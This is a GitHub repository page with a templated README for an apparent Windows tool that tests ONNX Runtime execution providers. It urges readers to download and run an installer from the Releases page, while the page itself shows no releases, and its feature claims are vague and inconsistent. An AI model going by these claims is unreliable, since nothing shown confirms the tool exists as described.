Skip to content

Daniel29751/ONNX-Runtime-Execution-Providers-Tester

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

13 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ€– ONNX-Runtime-Execution-Providers-Tester - Seamless Compatibility for Your AI Models

Download Release

πŸš€ Getting Started

Welcome to the ONNX-Runtime-Execution-Providers-Tester! This tool ensures your AI models work well on different hardware setups. It checks that each part of your machine learning model behaves as expected, no matter where you run it.

πŸ” Features

  • Cross-Hardware Validation: Tests ONNX models across various execution providers, ensuring consistent behavior.
  • User-Friendly Interface: Easy to navigate, even for non-technical users.
  • Comprehensive Testing: Validates every ONNX operator, providing reliable feedback on model performance.
  • Support for Multiple Frameworks: Works smoothly with LabVIEW, TensorRT, and OpenVINO.
  • Performance Insights: Get clear feedback on how each execution provider handles your models.

πŸ“¦ System Requirements

To run ONNX-Runtime-Execution-Providers-Tester, you need:

  • Operating System: Windows 10 or later
  • Processor: 1.5 GHz or faster multi-core
  • RAM: 4 GB or more
  • Disk Space: At least 100 MB free
  • Compatible Execution Providers: CUDA, DirectML, and OpenVINO support.

πŸ“₯ Download & Install

Visit the page to download the latest release:

Download ONNX-Runtime-Execution-Providers-Tester

Follow these simple steps to install:

  1. Go to the Releases page.
  2. Find the latest version of the software.
  3. Click on the download link for your operating system.
  4. Once downloaded, open the file to start the installation.
  5. Follow the on-screen instructions to complete the setup.

βš™οΈ How to Use

  1. Open the Application: Launch the ONNX-Runtime-Execution-Providers-Tester from your applications folder.
  2. Load Your Model: Click on the "Load Model" button and select your ONNX model file.
  3. Select Execution Providers: Choose which hardware you want to test the model against.
  4. Run the Validation: Click on "Validate Model" to see how well your model performs on your selected hardware.
  5. Review Results: Check the output for any inconsistencies or issues.

πŸ› οΈ Troubleshooting

If you encounter any problems:

  • Model Issues: Ensure your ONNX model is correctly formatted.
  • Performance Lag: Close unnecessary applications to free up system resources.
  • Execution Provider Problems: Verify that the right drivers and software are installed for your execution providers.

🌐 Community and Support

If you need help or want to share your feedback, you can connect with us:

  • GitHub Issues: Report a problem
  • User Forum: Join our community to discuss your experiences and ask questions.

πŸ“ Contributing

We welcome contributions! If you want to help enhance this project, feel free to submit a pull request. Follow these guidelines:

  1. Fork the repository.
  2. Create a new branch for your feature.
  3. Make your changes and test thoroughly.
  4. Submit a pull request with a clear description of your changes.

πŸ“œ License

This project is licensed under the MIT License. You are free to use and modify the software, but please keep the original license intact.

πŸ“Š Topics

ai, automation, backend, cpu, deep-learning, directml, execution-provider, gpu, graph-computing, inference, labview, model-validation, onnx, onnxruntime, openvino, operator-coverage, sota, tensorrt, testing, training

Visit the Releases page to get started with downloading the ONNX-Runtime-Execution-Providers-Tester. This tool will help you validate your AI models effectively. Happy testing!

About

πŸ§ͺ Test ONNX Runtime Execution Provider coverage with real-world operator support mappings for effective AI deployment insights.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors